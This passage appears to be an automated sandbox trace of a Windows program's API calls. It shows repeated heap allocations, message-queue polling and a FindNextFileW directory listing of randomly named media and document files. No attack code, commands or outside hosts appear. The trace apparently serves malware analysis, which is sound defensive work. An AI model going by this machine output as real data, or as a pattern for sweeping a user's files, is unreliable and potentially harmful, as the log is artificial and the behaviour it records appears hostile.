RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.504] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52104100, ftCreationTime.dwHighDateTime=0x1d4c566, ftLastAccessTime.dwLowDateTime=0x40d543c0, ftLastAccessTime.dwHighDateTime=0x1d4cdb5, ftLastWriteTime.dwLowDateTime=0x40d543c0, ftLastWriteTime.dwHighDateTime=0x1d4cdb5, nFileSizeHigh=0x0, nFileSizeLow=0x129d0, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="bXPQ0g368kO FpGH2kMH.gif", cAlternateFileName="BXPQ0G~1.GIF")) returned 1 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.504] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.504] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.504] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.505] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.505] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.505] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfecc2f10, ftCreationTime.dwHighDateTime=0x1d4d4f4, ftLastAccessTime.dwLowDateTime=0x121975c0, ftLastAccessTime.dwHighDateTime=0x1d4c91d, ftLastWriteTime.dwLowDateTime=0x121975c0, ftLastWriteTime.dwHighDateTime=0x1d4c91d, nFileSizeHigh=0x0, nFileSizeLow=0x8aa4, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="co6M9Umeg.jpg", cAlternateFileName="CO6M9U~1.JPG")) returned 1 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0190.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.505] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.505] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.505] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.505] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.505] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.505] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cddf390, ftCreationTime.dwHighDateTime=0x1d4d19a, ftLastAccessTime.dwLowDateTime=0x4f0dd5b0, ftLastAccessTime.dwHighDateTime=0x1d4c9b4, ftLastWriteTime.dwLowDateTime=0x4f0dd5b0, ftLastWriteTime.dwHighDateTime=0x1d4c9b4, nFileSizeHigh=0x0, nFileSizeLow=0x1f6a, dwReserved0=0x24a9bd0, dwReserved1=0x25c6e50, cFileName="CoTbYkKe.wav", cAlternateFileName="")) returned 1 [0190.505] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xedf9e5f0, ftCreationTime.dwHighDateTime=0x1d4d504, ftLastAccessTime.dwLowDateTime=0xe90312a0, ftLastAccessTime.dwHighDateTime=0x1d4c9c5, ftLastWriteTime.dwLowDateTime=0xe90312a0, ftLastWriteTime.dwHighDateTime=0x1d4c9c5, nFileSizeHigh=0x0, nFileSizeLow=0x174f, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="CoWnh3Q5rTDnpXdJ.mp3", cAlternateFileName="COWNH3~1.MP3")) returned 1 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dd9ae10, ftCreationTime.dwHighDateTime=0x1d4ca95, ftLastAccessTime.dwLowDateTime=0xb0f4f2d0, ftLastAccessTime.dwHighDateTime=0x1d4c749, ftLastWriteTime.dwLowDateTime=0xb0f4f2d0, ftLastWriteTime.dwHighDateTime=0x1d4c749, nFileSizeHigh=0x0, nFileSizeLow=0x7315, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="dunBms1jB_.jpg", cAlternateFileName="DUNBMS~1.JPG")) returned 1 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9efa880, ftCreationTime.dwHighDateTime=0x1d4cff9, ftLastAccessTime.dwLowDateTime=0x2f665040, ftLastAccessTime.dwHighDateTime=0x1d4cf98, ftLastWriteTime.dwLowDateTime=0x2f665040, ftLastWriteTime.dwHighDateTime=0x1d4cf98, nFileSizeHigh=0x0, nFileSizeLow=0x77a7, dwReserved0=0x24a9bd0, dwReserved1=0x25c6e50, cFileName="e-h1xk7cgYR.swf", cAlternateFileName="E-H1XK~1.SWF")) returned 1 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.506] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x48584a10, ftCreationTime.dwHighDateTime=0x1d4c8f7, ftLastAccessTime.dwLowDateTime=0xcb7b4b10, ftLastAccessTime.dwHighDateTime=0x1d4cc97, ftLastWriteTime.dwLowDateTime=0xcb7b4b10, ftLastWriteTime.dwHighDateTime=0x1d4cc97, nFileSizeHigh=0x0, nFileSizeLow=0x13e7, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="enrHxcENdtYHa.rtf", cAlternateFileName="ENRHXC~1.RTF")) returned 1 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacb8550, ftCreationTime.dwHighDateTime=0x1d4c923, ftLastAccessTime.dwLowDateTime=0x29904190, ftLastAccessTime.dwHighDateTime=0x1d4cfbf, ftLastWriteTime.dwLowDateTime=0x29904190, ftLastWriteTime.dwHighDateTime=0x1d4cfbf, nFileSizeHigh=0x0, nFileSizeLow=0x182dd, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="fieUnO JbD.odp", cAlternateFileName="FIEUNO~1.ODP")) returned 1 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.507] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2cb33fd0, ftCreationTime.dwHighDateTime=0x1d4c574, ftLastAccessTime.dwLowDateTime=0xaeeadad0, ftLastAccessTime.dwHighDateTime=0x1d4d1e5, ftLastWriteTime.dwLowDateTime=0xaeeadad0, ftLastWriteTime.dwHighDateTime=0x1d4d1e5, nFileSizeHigh=0x0, nFileSizeLow=0x134a3, dwReserved0=0x24a9bd0, dwReserved1=0x25c6e50, cFileName="f_H3Kw_rw4T-WXKpM.m4a", cAlternateFileName="F_H3KW~1.M4A")) returned 1 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dd3f190, ftCreationTime.dwHighDateTime=0x1d4ce53, ftLastAccessTime.dwLowDateTime=0x58527c20, ftLastAccessTime.dwHighDateTime=0x1d4d4ef, ftLastWriteTime.dwLowDateTime=0x58527c20, ftLastWriteTime.dwHighDateTime=0x1d4d4ef, nFileSizeHigh=0x0, nFileSizeLow=0x126b3, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="gFulebPw7UZ.flv", cAlternateFileName="GFULEB~1.FLV")) returned 1 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.508] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4819ce50, ftCreationTime.dwHighDateTime=0x1d4c732, ftLastAccessTime.dwLowDateTime=0x81e40e10, ftLastAccessTime.dwHighDateTime=0x1d4cf35, ftLastWriteTime.dwLowDateTime=0x81e40e10, ftLastWriteTime.dwHighDateTime=0x1d4cf35, nFileSizeHigh=0x0, nFileSizeLow=0xc2ab, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="GHNzGfsXtZO 6LRI5J.png", cAlternateFileName="GHNZGF~1.PNG")) returned 1 [0190.509] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.509] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.509] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.509] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458fa210, ftCreationTime.dwHighDateTime=0x1d4d027, ftLastAccessTime.dwLowDateTime=0x66ab0250, ftLastAccessTime.dwHighDateTime=0x1d4cdf2, ftLastWriteTime.dwLowDateTime=0x66ab0250, ftLastWriteTime.dwHighDateTime=0x1d4cdf2, nFileSizeHigh=0x0, nFileSizeLow=0x11372, dwReserved0=0x24a9bd0, dwReserved1=0x25c6e50, cFileName="Go gw9icCK1.m4a", cAlternateFileName="GOGW9I~1.M4A")) returned 1 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.514] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb606510, ftCreationTime.dwHighDateTime=0x1d4cfcf, ftLastAccessTime.dwLowDateTime=0xe1586be0, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0xe1586be0, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x168c3, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="Ie7x9Fbl.m4a", cAlternateFileName="")) returned 1 [0190.515] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.515] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.515] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.517] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.517] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.517] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x522e0c50, ftCreationTime.dwHighDateTime=0x1d4cfa5, ftLastAccessTime.dwLowDateTime=0x2da73d0, ftLastAccessTime.dwHighDateTime=0x1d4ce30, ftLastWriteTime.dwLowDateTime=0x2da73d0, ftLastWriteTime.dwHighDateTime=0x1d4ce30, nFileSizeHigh=0x0, nFileSizeLow=0xda8a, dwReserved0=0x24a9bd0, dwReserved1=0x25c6e50, cFileName="JdjU4gAsI 0_L.gif", cAlternateFileName="JDJU4G~1.GIF")) returned 1 [0190.518] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.518] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.519] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.519] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.519] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.519] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x745540d0, ftCreationTime.dwHighDateTime=0x1d4cfed, ftLastAccessTime.dwLowDateTime=0x8e37ef60, ftLastAccessTime.dwHighDateTime=0x1d4cd82, ftLastWriteTime.dwLowDateTime=0x8e37ef60, ftLastWriteTime.dwHighDateTime=0x1d4cd82, nFileSizeHigh=0x0, nFileSizeLow=0x38ea, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="jfoRUvp.mkv", cAlternateFileName="")) 